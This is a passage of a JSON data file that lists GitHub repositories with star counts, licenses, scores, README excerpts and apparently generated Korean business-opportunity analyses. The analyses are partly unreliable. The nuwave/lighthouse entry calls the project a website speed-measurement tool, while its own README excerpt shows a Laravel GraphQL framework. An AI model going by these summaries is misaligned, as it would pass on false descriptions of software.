만들어주는 도구로, 스마트폰이나 저사양 기기에서 AI를 사용하고 싶은 기업들이 필수적으로 필요합니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 최적화 SaaS**: 기업의 AI 모델을 자동으로 압축하고 모바일 앱에 맞게 변환해주는 클라우드 서비스\n2. *","readme_excerpt":"# ONNX Simplifier\n\n[![PyPI version](https://img.shields.io/pypi/v/onnxsim.svg)](https://pypi.python.org/pypi/onnxsim/)\n[![PyPI pyversions](https://img.shields.io/pypi/pyversions/onnxsim.svg)](https://pypi.python.org/pypi/onnxsim/)\n[![PyPI license](https://img.shields.io/pypi/l/onnxsim.svg)](https://pypi.python.org/pypi/onnxsim/)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/onnxsim/onnxsim/pulls)\n[![Discord](https://img.shields.io/discord/1475920534847099121?logo=discord)](https://discord.gg/W3ht33v4)\n\n_ONNX is great, but sometimes too complicated._\n\n## Background\n\nOne day I wanted to export the following simple reshape operation to ONNX:\n\n```python\nimport torch\n\n\nclass JustReshape(torch.nn.Module):\n    def __init__(self):\n        super(JustReshape, self).__init__()\n\n    def forward(self, x):\n        return x.view((x.shape[0], x.shape[1], x.shape[3], x.shape[2]))\n\n\nnet = JustReshape()\nmodel_name = 'just_reshape.onnx'\ndummy_input = torch.r","composite_score":0.0289,"license_safety_tag":"safe"},{"name":"HaxeFoundation/haxe","github_url":"https://github.com/HaxeFoundation/haxe","stars":5,"language":"Haxe","license":"NOASSERTION","abandonment_months":0,"description":"# Haxe 프로젝트 분석 보고서\n\n## 왜 보물인가\n한 번의 코드 작성으로 게임, 웹, 모바일 앱 등 여러 플랫폼에서 동시에 작동하는 프로그램을 만들 수 있는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 플랫폼 (SaaS)**\n- 인디 게임 개발자들이 구독하는 웹 기반 게임 제작 도구로 월 이용료 수취\n- 한 번의 제작으로 PC, 모","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://haxe.org/\" title=\"haxe.org\"><img src=\"extra/images/Readme.png\" /></a>\n</p>\n\n<p align=\"center\">\n\t<a href=\"https://github.com/HaxeFoundation/haxe/actions\"><img src=\"https://github.com/HaxeFoundation/haxe/workflows/CI/badge.svg\" alt=\"GitHub Build Status\"></a>\n\t<a href=\"https://saucelabs.com/u/haxe\"><img src=\"https://saucelabs.com/buildstatus/haxe\" alt=\"SauceLabs Test Status\"></a>\n\t<a href=\"https://gitter.im/HaxeFoundation/haxe?utm_source=badge&amp;utm_medium=badge&amp;utm_campaign=pr-badge\"><img src=\"https://badges.gitter.im/Join%20Chat.svg\" alt=\"Gitter\"></a>\n\t<a href=\"https://discordapp.com/invite/0uEuWH3spjck73Lo\"><img src=\"https://img.shields.io/discord/162395145352904705.svg?logo=discord\" alt=\"Discord\"></a>\n</p>\n\n#\n\nHaxe is an open source toolkit that allows you to easily build cross-platform tools and applications that target many mainstream platforms. The Haxe toolkit includes:\n\n * **The Haxe programming language**, a modern, high-level, strictl","composite_score":0.0288,"license_safety_tag":"unknown"},{"name":"rebing/graphql-laravel","github_url":"https://github.com/rebing/graphql-laravel","stars":6,"language":"PHP","license":"mit","abandonment_months":1,"description":"# GraphQL-Laravel 보물 분석\n\n## 왜 보물인가\n웹사이트 백엔드를 더 효율적으로 만들어주는 개발 도구로, Laravel(인기 있는 웹 개발 플랫폼)과 GraphQL(데이터 요청 방식)을 연결하는 다리 역할을 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 조회가 많은 관리자 시스템(CRM, ERP)의 백엔드 구축\n- *","readme_excerpt":"# Laravel GraphQL\n\n[![Latest Stable Version](https://poser.pugx.org/rebing/graphql-laravel/v/stable)](https://packagist.org/packages/rebing/graphql-laravel)\n[![License](https://poser.pugx.org/rebing/graphql-laravel/license)](https://packagist.org/packages/rebing/graphql-laravel)\n[![Tests](https://github.com/rebing/graphql-laravel/workflows/Tests/badge.svg)](https://github.com/rebing/graphql-laravel/actions?query=workflow%3ATests)\n[![codecov](https://codecov.io/gh/rebing/graphql-laravel/branch/master/graph/badge.svg)](https://codecov.io/gh/rebing/graphql-laravel)\n[![Downloads](https://img.shields.io/packagist/dt/rebing/graphql-laravel.svg?style=flat-square)](https://packagist.org/packages/rebing/graphql-laravel)\n[![Get on Slack](https://img.shields.io/badge/slack-join-orange.svg)](https://rebing-graphql.slack.com/join/shared_invite/enQtNTE5NjQzNDI5MzQ4LTdhNjk0ZGY1N2U1YjE4MGVlYmM2YTc2YjQ0MmIwODY5MWMwZWIwYmY1MWY4NTZjY2Q5MzdmM2Q3NTEyNDYzZjc#/shared-invite/email)\n\nThis package provides a co","composite_score":0.0288,"license_safety_tag":"safe"},{"name":"ocaml-multicore/retro-httpaf-bench","github_url":"https://github.com/ocaml-multicore/retro-httpaf-bench","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":2,"description":"# ocaml-multicore/retro-httpaf-bench 분석\n\n## 왜 보물인가\n웹 서버의 속도를 정확하게 측정하고 비교할 수 있는 도구로, 인터넷 서비스 품질 개선에 필수적인 기준점을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 웹 호스팅 업체가 자사 서버 성능을 고객에게 검증하고 경쟁사와 비교하는 성능","readme_excerpt":"# retro-httpaf-bench\n\n[![CI](https://github.com/sadiqj/retro-httpaf-bench/actions/workflows/build_image.yml/badge.svg)](https://github.com/sadiqj/retro-httpaf-bench/actions/workflows/build_image.yml)\nThis project uses submodules, so make sure you use `--recursive` when cloning:\n```sh\ngit clone --recursive https://github.com/ocaml-multicore/retro-httpaf-bench.git\n```\n\nSet of scripts for building and running some http server benchmarks. More details to come.\n\nThe Dockerfile can be used to build a container that will run everything.\nRunning `make` will build the image and run the tests.\nAfterwards, the results are available as `output/parse_output.html`.\n\nNote that running `make` deletes any existing files in `output/`.\n","composite_score":0.0287,"license_safety_tag":"unknown"},{"name":"Naereen/badges","github_url":"https://github.com/Naereen/badges","stars":11,"language":"Makefile","license":"MIT","abandonment_months":1,"description":"# Naereen/badges 상품화 분석\n\n## 왜 보물인가\n웹사이트나 문서에 붙이는 다양한 배지(뱃지) 디자인을 한 곳에서 모아놓아서, 프로젝트의 상태와 품질을 한눈에 표현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 프로젝트 관리 플랫폼에서 팀의 작업 현황을 시각적으로 표시하는 대시보드 기능\n**내부 업무 도구**: 회사","readme_excerpt":"# List of Badges, in Markdown\nA list of badges, with their Markdown code, that can be included in a `README.md` file for a GitHub or Bitbucket project.\n\n> The same file for [reStructuredText](http://docutils.sourceforge.net/rst.html) code is available here: [README.rst](README.rst).\n\n<details>\n<summary>Table of content</summary>\n\n## Table of content\n- [List of Badges, in Markdown](#list-of-badges-in-markdown)\n  - [Table of content](#table-of-content)\n  - [Generic](#generic)\n  - [Useful](#useful)\n    - [Maintained?](#maintained)\n    - [Related Repos](#related-repos)\n    - [Website up/down](#website-updown)\n  - [Feedback](#feedback)\n    - [*\"Ask me anything\"* in English](#ask-me-anything-in-english)\n    - [*\"Demandez moi n'importe quoi\"* in French](#demandez-moi-nimporte-quoi-in-french)\n  - [Python related](#python-related)\n      - [Jupyter Notebook](#jupyter-notebook)\n      - [Google Collab](#google-collab)\n      - [Binder](#binder)\n  - [Go related](#go-related)\n  - [Rust related](#rust","composite_score":0.0286,"license_safety_tag":"safe"},{"name":"andymass/vim-matchup","github_url":"https://github.com/andymass/vim-matchup","stars":13,"language":"Vim Script","license":"MIT","abandonment_months":2,"description":"# vim-matchup 분석 보고서\n\n## 왜 보물인가\n텍스트 편집기에서 괄호나 태그의 짝을 자동으로 찾아주는 기능으로, 프로그래머들의 코딩 속도를 크게 향상시킬 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 코딩 교육 플랫폼 (SaaS)**\n초보 프로그래머들을 위한 온라인 강좌에서 괄호 매칭 기능을 기본으로 제공하여 학습 난이도를 ","readme_excerpt":"<div align=\"center\">\n<p>\n<img src='https://github.com/andymass/matchup.vim/wiki/images/teaser.jpg' width='250px' alt='and in this corner...' />\n</p>\n</div>\n\n<h1 align=\"center\">\n  vim match-up :fist_right::fist_left:\n</h1>\n\nmatch-up is a plugin that lets you highlight, navigate, and operate on\nsets of matching text. It extends vim's `%` key to language-specific\nwords instead of just single characters.\n\n## Screenshot\n\n<img src='https://raw.githubusercontent.com/wiki/andymass/vim-matchup/images/match-up-hl1.gif' width='450px'>\n\n## Table of contents\n\n- [Overview](#overview)\n- [Installation](#installation)\n- [Features](#features)\n- [Options](#options)\n- [FAQ](#faq)\n- [Interoperability](#interoperability)\n- [Acknowledgments](#acknowledgments)\n- [Development](#development)\n\n## Overview\n\nmatch-up can be used as a drop-in replacement for the classic plugin [matchit.vim].\nmatch-up aims to enhance all of matchit's features, fix a number of its\ndeficiencies and bugs, and add a few totally new feat","composite_score":0.0284,"license_safety_tag":"safe"},{"name":"mozilla/rr","github_url":"https://github.com/mozilla/rr","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# mozilla/rr 상용화 분석\n\n## 왜 보물인가\nMozilla에서 만든 이 도구는 복잡한 소프트웨어 문제를 자동으로 재현하고 분석해주는 기술로, 개발사들의 버그 수정 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 개발사를 위한 클라우드 기반 디버깅 플랫폼 (월 구독형)\n2. **내부 업무 도","readme_excerpt":"# Overview\n\n[![Build and test status](https://github.com/rr-debugger/rr/actions/workflows/build-and-test-main.yml/badge.svg?branch=master)](https://github.com/rr-debugger/rr/actions)\n\nrr is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads).\nDebugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun. More information about the project, including instructions on how to install, run, and build rr, is at [https://rr-project.org](https://rr-project.org). The best technical overview is currently the paper [Engineering Record And Replay For Deployability: Extended Technical Report](https://arxiv.org/pdf/1705.05937.pdf).\n\nOr go directly to the [installation and building instructions](https://github.com/rr-debugger/rr/wiki/Building-And-Installing).\n\nPlease contribute!  Make sure to review the [pull request checklis","composite_score":0.0283,"license_safety_tag":"unknown"},{"name":"isaacs/node-glob","github_url":"https://github.com/isaacs/node-glob","stars":6,"language":"TypeScript","license":"isc","abandonment_months":1,"description":"# node-glob 사업화 분석\n\n## 왜 보물인가\n컴퓨터 파일을 찾는 작업을 자동으로 처리해주는 기본 도구로, 전 세계 수백만 개의 소프트웨어 프로젝트에서 필수적으로 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 파일 관리 SaaS**\n클라우드에 저장된 수천 개 파일을 빠르게 검색·정리하는 서비스로, 중소기업의 문서 관리 비용을 절감해줍니다.","readme_excerpt":"# Glob\n\nMatch files using the patterns the shell uses.\n\nThe most correct and second fastest glob implementation in\nJavaScript. (See [**Comparison to Other JavaScript Glob\nImplementations**](#comparisons-to-other-fnmatchglob-implementations)\nat the bottom of this readme.)\n\n![a fun cartoon logo made of glob\ncharacters](https://github.com/isaacs/node-glob/raw/main/logo/glob.png)\n\n## Usage\n\nInstall with npm\n\n```\nnpm i glob\n```\n\n> [!NOTE]\n> The npm package name is _not_ `node-glob` that's a\n> different thing that was abandoned years ago. Just `glob`.\n\n```js\n// load using import\nimport { glob, globSync, globStream, globStreamSync, Glob } from 'glob'\n// or using commonjs, that's fine, too\nconst {\n  glob,\n  globSync,\n  globStream,\n  globStreamSync,\n  Glob,\n} = require('glob')\n\n// the main glob() and globSync() resolve/return array of filenames\n\n// all js files, but don't look in node_modules\nconst jsfiles = await glob('**/*.js', { ignore: 'node_modules/**' })\n\n// pass in a signal to cancel the","composite_score":0.0282,"license_safety_tag":"safe"},{"name":"timothycrosley/isort","github_url":"https://github.com/timothycrosley/isort","stars":5,"language":"Python","license":"mit","abandonment_months":0,"description":"# isort 저장소 분석 보고서\n\n## 왜 보물인가\n파이썬 프로그래밍에서 코드 정렬 작업을 자동으로 해주는 도구로, 개발자들의 반복적인 수작업을 대폭 줄여주는 생산성 향상 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 협업 플랫폼 (SaaS)**\n- 코드 리뷰 자동화 서비스에 isort를 통합하여 형식 검토 자동화\n\n**2. 기업 소프트웨어 ","readme_excerpt":"[![isort - isort your imports, so you don't have to.](https://raw.githubusercontent.com/pycqa/isort/main/art/logo_large.png)](https://isort.readthedocs.io/)\n\n------------------------------------------------------------------------\n\n[![PyPI version](https://badge.fury.io/py/isort.svg)](https://badge.fury.io/py/isort)\n[![Python Version](https://img.shields.io/pypi/pyversions/isort)][pypi status]\n[![CI](https://github.com/PyCQA/isort/actions/workflows/continuous-integration.yml/badge.svg)](https://github.com/PyCQA/isort/actions/workflows/continuous-integration.yml)\n[![Code coverage Status](https://codecov.io/gh/pycqa/isort/branch/main/graph/badge.svg)](https://codecov.io/gh/pycqa/isort)\n[![License](https://img.shields.io/github/license/mashape/apistatus.svg)](https://pypi.org/project/isort/)\n[![Downloads](https://pepy.tech/badge/isort)](https://pepy.tech/project/isort)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![Impor","composite_score":0.0282,"license_safety_tag":"safe"},{"name":"staticallyio/statically","github_url":"https://github.com/staticallyio/statically","stars":10,"language":"TypeScript","license":"unknown","abandonment_months":2,"description":"# Statically 저장소 분석\n\n## 왜 보물인가\n웹사이트를 빠르게 만들어주는 기술로, 전 세계 방문자들이 빠른 속도로 콘텐츠를 받을 수 있게 하는 서비스입니다.\n\n## 어디에 쓸 수 있나\n\n1. **콘텐츠 전송 SaaS**: 블로그, 뉴스, 이커머스 사이트 운영자들이 월 구독으로 빠른 콘텐츠 배포 서비스를 사용\n2. **기업 내부 도구**: 대규모 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://statically.io/screenshot/\">\n    <img src=\"https://statically.io/images/branding/statically-mark.svg\" alt=\"Statically\" height=\"80\"/>\n  </a>\n</p>\n\n<h1 align=\"center\">Statically</h1>\n\n<p align=\"center\">A free, fast global content delivery network for open-source projects.</p>\n\n<p align=\"center\">\n  <a href=\"https://statically.io\">statically.io</a>\n  <br /><br />\n\t<a href=\"https://x.com/staticallyio\">\n    <img src=\"https://img.shields.io/twitter/follow/staticallyio?label=Follow&style=social\" alt=\"X\" />\n  </a>\n  <a href=\"https://www.patreon.com/fransallen\">\n    <img src=\"https://img.shields.io/badge/donate-Patreon-ff69b4\" alt=\"Donate\" />\n  </a>\n</p>\n\n## Overview\n\n**Statically** is a free, fast global content delivery network (CDN) for open-source projects. It helps developers easily distribute static assets such as CSS and JavaScript libraries. It supports popular platforms like GitHub, GitLab, Bitbucket, and npm, making it simple and reliable for develo","composite_score":0.0282,"license_safety_tag":"unknown"},{"name":"CrunchyData/postgres-operator","github_url":"https://github.com/CrunchyData/postgres-operator","stars":6,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# CrunchyData/postgres-operator 분석 보고서\n\n## 왜 보물인가\n데이터베이스 운영의 복잡한 작업들을 자동화해주는 기술로, 기업들이 데이터 관리에 드는 시간과 비용을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 클라우드 기반 데이터베이스 호스팅 서비스로 고객들에게 관리형 데이터베이스를 렌탈하는","readme_excerpt":"<h1 align=\"center\">PGO: The Postgres Operator from Crunchy Data</h1>\n<p align=\"center\">\n  <img width=\"150\" src=\"./img/CrunchyDataPrimaryIcon.png\" alt=\"PGO: The Postgres Operator from Crunchy Data\"/>\n</p>\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/CrunchyData/postgres-operator)](https://goreportcard.com/report/github.com/CrunchyData/postgres-operator)\n![GitHub Repo stars](https://img.shields.io/github/stars/CrunchyData/postgres-operator)\n[![License](https://img.shields.io/github/license/CrunchyData/postgres-operator)](LICENSE.md)\n[![Discord](https://img.shields.io/discord/1068276526740676708?label=discord&logo=discord)](https://discord.gg/a7vWKG8Ec9)\n\n# Production Postgres Made Easy\n\n[PGO](https://github.com/CrunchyData/postgres-operator), the [Postgres Operator](https://github.com/CrunchyData/postgres-operator) from [Crunchy Data](https://www.crunchydata.com), gives you a **declarative Postgres** solution that automatically manages your [PostgreSQL](https://www.postg","composite_score":0.0282,"license_safety_tag":"safe"},{"name":"nodejs/Release","github_url":"https://github.com/nodejs/Release","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":0,"description":"# nodejs/Release 분석 보고서\n\n## 왜 보물인가\nNode.js(웹 서비스를 만드는 기본 도구)의 공식 배포판을 관리하는 저장소로, 전 세계 개발자들이 의존하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: Node.js 버전 호환성을 자동으로 테스트하고 인증하는 클라우드 서비스\n2. **내부 업무 도구**: 회","readme_excerpt":"# Node.js Release Working Group\n\n## Release schedule\n\n| Release  | Status              | Codename     |Initial Release | Active LTS Start | Maintenance Start | End-of-life               |\n| :--:     | :---:               | :---:        | :---:          | :---:            | :---:             | :---:                     |\n| [22.x][] | **Maintenance LTS** | [Jod][]      | 2024-04-24     | 2024-10-29       | 2025-10-21        | 2027-04-30                |\n| [24.x][] | **Active LTS**      | [Krypton][]  | 2025-05-06     | 2025-10-28       | 2026-10-20        | 2028-04-30                |\n| [25.x][] | **Maintenance**     |              | 2025-10-15     | -                | 2026-04-01        | 2026-06-01                |\n| [26.x][] | **Current**         |              | 2026-05-05     | 2026-10-28       | 2027-10-27        | 2029-04-30                |\n\nDates are subject to change.\n\n<p><img src=\"schedule.svg\" alt=\"LTS Schedule\"/></p>\n\nThe Release schedule is available also as a [JSON][] file.","composite_score":0.028,"license_safety_tag":"unknown"},{"name":"megaease/easeagent","github_url":"https://github.com/megaease/easeagent","stars":12,"language":"Java","license":"Apache-2.0","abandonment_months":1,"description":"# EaseAgent 사업화 분석\n\n## 왜 보물인가\n소프트웨어 개발팀이 애플리케이션의 성능 문제를 자동으로 감지하고 해결할 수 있게 도와주는 똑똑한 모니터링 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발사들을 위한 클라우드 기반 애플리케이션 성능 모니터링 플랫폼으로 월 구독료를 받고 서비스 제공\n2. **내부 업무 도구**:","readme_excerpt":"# EaseAgent\n\nA lightweight & opening Java Agent for Cloud-Native and APM system\n\n- [EaseAgent](#easeagent)\n  - [Overview](#overview)\n    - [Purpose](#purpose)\n    - [Principles](#principles)\n  - [Features](#features)\n  - [Architecture Diagram](#architecture-diagram)\n      - [Description](#description)\n  - [QuickStart](#quickstart)\n    - [Get And Set Environment Variable](#get-and-set-environment-variable)\n      - [Setup Environment Variable](#setup-environment-variable)\n      - [Download](#download)\n      - [Build From the Source](#build-from-the-source)\n      - [Get Configuration file](#get-configuration-file)\n    - [Monitor Spring Petclinic](#monitor-spring-petclinic)\n      - [Prerequisites](#prerequisites)\n      - [Initialize and Start the project](#initialize-and-start-the-project)\n      - [Metric](#metric)\n      - [Tracing](#tracing)\n      - [Build Spring Petclinic](#build-spring-petclinic)\n    - [Add an Enhancement Plugin](#add-an-enhancement-plugin)\n  - [User Manual](#user-manua","composite_score":0.0279,"license_safety_tag":"safe"},{"name":"okbob/pspg","github_url":"https://github.com/okbob/pspg","stars":6,"language":"C","license":"bsd-2-clause","abandonment_months":2,"description":"# pspg 프로젝트 분석\n\n## 왜 보물인가\n엑셀이나 데이터베이스처럼 대량의 정보를 보기 쉽게 표시해주는 무료 도구로, 기업들이 매번 비싼 소프트웨어를 살 필요를 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹기반 데이터 분석 플랫폼에 내장하여 사용자가 복잡한 데이터를 쉽게 탐색하도록 제공\n2. **내부 업무 도구**: 금","readme_excerpt":"[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://stand-with-ukraine.pp.ua)\n\n# pspg - Postgres Pager\n\nEverybody who uses `psql` also uses the `less` pager. Which, while it works well, has no special\nsupport for tabular data. I found a few projects, but none was good enough for this purpose.\nThus I decided to write a small specialized pager to use as a `psql` pager.\n\n![Screenshot](screenshots/pspg-4.3.0-mc-export-111x34.png)\n\nThis pager can be used from the following command line clients, too:\n\n- `mysql`\n- `sqlite`\n- [`pgcli`](https://github.com/dbcli/pgcli/)\n- `monetdb`\n- [`Trino (formerly Presto SQL)`](https://trino.io/)\n- [`usql`](https://github.com/xo/usql/)\n- [`sqlcl`](https://github.com/okbob/pspg/#sqlcl) (for oracle)\n- [`nushell`](https://www.nushell.sh/)\n\n## Main target\n\n* ability to freeze the first few rows, or first few columns\n* ability to sort data by the specified numeric column\n* ability to use fancy th","composite_score":0.0279,"license_safety_tag":"safe"},{"name":"apollographql/apollo-android","github_url":"https://github.com/apollographql/apollo-android","stars":5,"language":"Kotlin","license":"mit","abandonment_months":0,"description":"# Apollo Android 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 인터넷 데이터를 효율적으로 주고받을 수 있게 해주는 업계 표준 기술로, 많은 개발자와 회사들이 필요로 하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 플랫폼**: 안드로이드 개발사들을 위한 클라우드 기반 서비스로, 월 사용량에 따라 과금\n2. **기업 ","readme_excerpt":"<header>\n  <div align=\"center\">\n    <a href=\"https://www.apollographql.com?utm_medium=github&utm_source=apollographql_apollo-kotlin&utm_campaign=readme\"><img src=\"https://raw.githubusercontent.com/apollographql/apollo-client-devtools/main/assets/apollo-wordmark.svg\" height=\"100\" alt=\"Apollo Logo\"></a>\n  </div>\n    <div align=\"center\">\n\n[![Discourse](https://img.shields.io/discourse/topics?label=Discourse&server=https%3A%2F%2Fcommunity.apollographql.com&logo=discourse&color=467B95&style=flat-square)](http://community.apollographql.com/new-topic?category=Help&tags=mobile,client)\n[![Slack](https://img.shields.io/static/v1?label=kotlinlang&message=apollo-kotlin&color=A97BFF&logo=slack&style=flat-square)](https://app.slack.com/client/T09229ZC6/C01A6KM1SBZ)\n\n[![Snapshots](https://img.shields.io/maven-metadata/v?metadataUrl=https%3A%2F%2Fcentral.sonatype.com%2Frepository%2Fmaven-snapshots%2Fcom%2Fapollographql%2Fapollo%2Fapollo-api-jvm%2Fmaven-metadata.xml&style=flat-square&label=snapshots&co","composite_score":0.0278,"license_safety_tag":"safe"},{"name":"ory/editor","github_url":"https://github.com/ory/editor","stars":6,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Ory/Editor 기술 분석\n\n## 왜 보물인가\n누구나 쉽게 웹 페이지를 만들고 수정할 수 있는 '드래그앤드롭' 편집 도구로, 코딩 지식 없이도 전문가 수준의 웹사이트를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: 소상공인이 자신의 쇼핑몰이나 포트폴리오 사이트를 직접 만들고 관리하는 서비스\n2. **기업 내부 도","readme_excerpt":"# ReactPage\n\n⚠️ LOOKING FOR MAINTAINERS ⚠️\n\nsee https://github.com/react-page/react-page/issues/1329\n\n\n\n\n---\n\n[![Build Status](https://app.travis-ci.com/react-page/react-page.svg?branch=master)](https://app.travis-ci.com/react-page/react-page)\n[![Coverage Status](https://coveralls.io/repos/github/ory-am/editor/badge.svg?branch=master)](https://coveralls.io/github/ory/editor?branch=master)\n[![Docs](https://img.shields.io/badge/docs-guide-blue.svg)](https://react-page.github.io/docs)\n\nReactPage is a smart, extensible and modern editor (\"WYSIWYG\") for the web written in React. If you are fed up with the limitations of `contenteditable`, you are in the right place.\n\n<img width=\"60%\" alt=\"ReactPage Demo\" src=\"/docs-images/quick-example.gif\">\n\n## Install\n\n`yarn add @react-page/editor`\n\nor\n\n`npm install --save @react-page/editor`\n\nThere is also a `beta` release channel, which might contain unstable features:\n\n`yarn add @react-page/editor@beta`\n\nor\n\n`npm install --save @react-page/editor@beta`","composite_score":0.0278,"license_safety_tag":"safe"},{"name":"phpzlc/phpzlc","github_url":"https://github.com/phpzlc/phpzlc","stars":11,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# phpzlc/phpzlc 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 기초 부품들을 모아둔 \"레고 세트\" 같은 도구로, 개발자들이 처음부터 다시 만들 필요 없이 빠르게 서비스를 출시할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 중소 스타트업의 SaaS 서비스**\n- 초기 개발 비용을 줄이고 빠르게 서비스를 론칭해야 하는 회","readme_excerpt":"## PHPZlc & Symfony \n\nPHPZlc是基于Symfony的脚手架工具\n\n为开发者提供全套Symfony实践教程和解决方案。\n\n## 官网\n\n[https://phpzlc.com](https://phpzlc.com)\n","composite_score":0.0277,"license_safety_tag":"safe"},{"name":"nuwave/lighthouse","github_url":"https://github.com/nuwave/lighthouse","stars":5,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Lighthouse 저장소 분석\n\n## 왜 보물인가\n웹사이트의 속도와 성능을 자동으로 측정해주는 도구로, 온라인 비즈니스의 고객 만족도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 홈페이지 성능을 주기적으로 모니터링하고 개선 방안을 제시하는 클라우드 서비스\n- **내부 업무 도구**: 대형 포털사이트에서 수백","readme_excerpt":"**This repository is planned to move to [spawnia/lighthouse](https://github.com/spawnia/lighthouse).**\n**See the [announcement](https://github.com/nuwave/lighthouse/discussions/2767) for details and to share feedback.**\n\n<a href=\"https://lighthouse-php.com\">\n  <img src=\"logo.png\" alt=\"Lighthouse\" width=\"150\" height=\"150\">\n</a>\n\n# Lighthouse\n\nA framework for serving GraphQL from Laravel.\n\nLighthouse is a GraphQL framework that integrates with your Laravel application.\nIt combines the best ideas of both ecosystems.\nIt solves common tasks with ease and offers flexibility when you need it.\n\n## Sponsors\n\nIf you make money using this project, please consider sponsoring [its maintainer on GitHub Sponsors](https://github.com/sponsors/spawnia) or [the project on Patreon](https://www.patreon.com/lighthouse_php).\n\n## Documentation\n\nThe documentation lives at [lighthouse-php.com](https://lighthouse-php.com).\n\nThe site includes the latest docs for each major version of Lighthouse.\nYou can find docs","composite_score":0.0277,"license_safety_tag":"safe"},{"name":"jedisct1/dsvpn","github_url":"https://github.com/jedisct1/dsvpn","stars":11,"language":"C","license":"MIT","abandonment_months":1,"description":"# jedisct1/dsvpn 분석\n\n## 왜 보물인가\n인터넷 연결을 안전하게 암호화해주는 가볍고 빠른 도구로, 공공 와이파이에서도 개인정보 유출을 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **VPN 서비스 SaaS**: 개인 사용자를 위한 월 구독형 보안 인터넷 접속 서비스\n2. **기업 보안 도구**: 직원들의 원격근무 시 회사 네트워크를 안","readme_excerpt":"# ![DSVPN](https://raw.github.com/jedisct1/dsvpn/master/logo.png)\n\n[![GitHub CI status](https://github.com/jedisct1/dsvpn/workflows/CI/badge.svg)](https://github.com/jedisct1/dsvpn/actions)\n![CodeQL scan](https://github.com/jedisct1/dsvpn/workflows/CodeQL%20scan/badge.svg)\n\nDSVPN is a Dead Simple VPN, designed to address the most common use case for using a VPN:\n\n```text\n[client device] ---- (untrusted/restricted network) ---- [vpn server] ---- [the Internet]\n```\n\nFeatures:\n\n* Runs on TCP. Works pretty much everywhere, including on public WiFi where only TCP/443 is open or reliable.\n* Uses only modern cryptography, with formally verified implementations.\n* Small and constant memory footprint. Doesn't perform any heap memory allocations.\n* Small (~25 KB), with an equally small and readable code base. No external dependencies.\n* Works out of the box. No lousy documentation to read. No configuration file. No post-configuration. Run a single-line command on the server, a similar one on the","composite_score":0.0276,"license_safety_tag":"safe"},{"name":"cea-sec/ivre","github_url":"https://github.com/cea-sec/ivre","stars":6,"language":"Python","license":"gpl-3.0","abandonment_months":0,"description":"# cea-sec/ivre 평가 보고서\n\n## 왜 보물인가\n네트워크 보안 전문가들이 컴퓨터 시스템의 약점을 찾아내고 관리하는 작업을 자동화하는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 진단 SaaS**: 중소기업들이 자신의 시스템 보안 상태를 정기적으로 점검하는 월 구독 서비스\n2. **보안 회사의 내부 업무 도구**: 보안 컨","readme_excerpt":"[![Follow on Twitter](https://img.shields.io/twitter/follow/IvreRocks.svg?logo=twitter)](https://twitter.com/IvreRocks)\n[![Follow on Mastodon](https://img.shields.io/mastodon/follow/109349639355238149?domain=https%3A%2F%2Finfosec.exchange&style=social)](https://infosec.exchange/@ivre)\n[![GitHub stars](https://img.shields.io/github/stars/ivre/ivre?style=social)](https://github.com/ivre/ivre)\n[![PyPI downloads](https://pepy.tech/badge/ivre)](https://pypi.org/project/ivre/)\n[![Docker pulls](https://img.shields.io/docker/pulls/ivre/web)](https://hub.docker.com/u/ivre/)\n\n[![MongoDB and Elasticsearch tests](https://github.com/ivre/ivre/actions/workflows/mongodb.yml/badge.svg?branch=master)](https://github.com/ivre/ivre/actions/workflows/mongodb.yml/?branch=master)\n[![PostgreSQL tests](https://github.com/ivre/ivre/actions/workflows/postgres.yml/badge.svg?branch=master)](https://github.com/ivre/ivre/actions/workflows/postgres.yml/?branch=master)\n[![Maxmind tests](https://github.com/ivre/ivre/a","composite_score":0.0276,"license_safety_tag":"restricted"},{"name":"AlphaYu/Adnc","github_url":"https://github.com/AlphaYu/Adnc","stars":8,"language":"C#","license":"MIT","abandonment_months":1,"description":"# AlphaYu/Adnc 저장소 분석\n\n## 왜 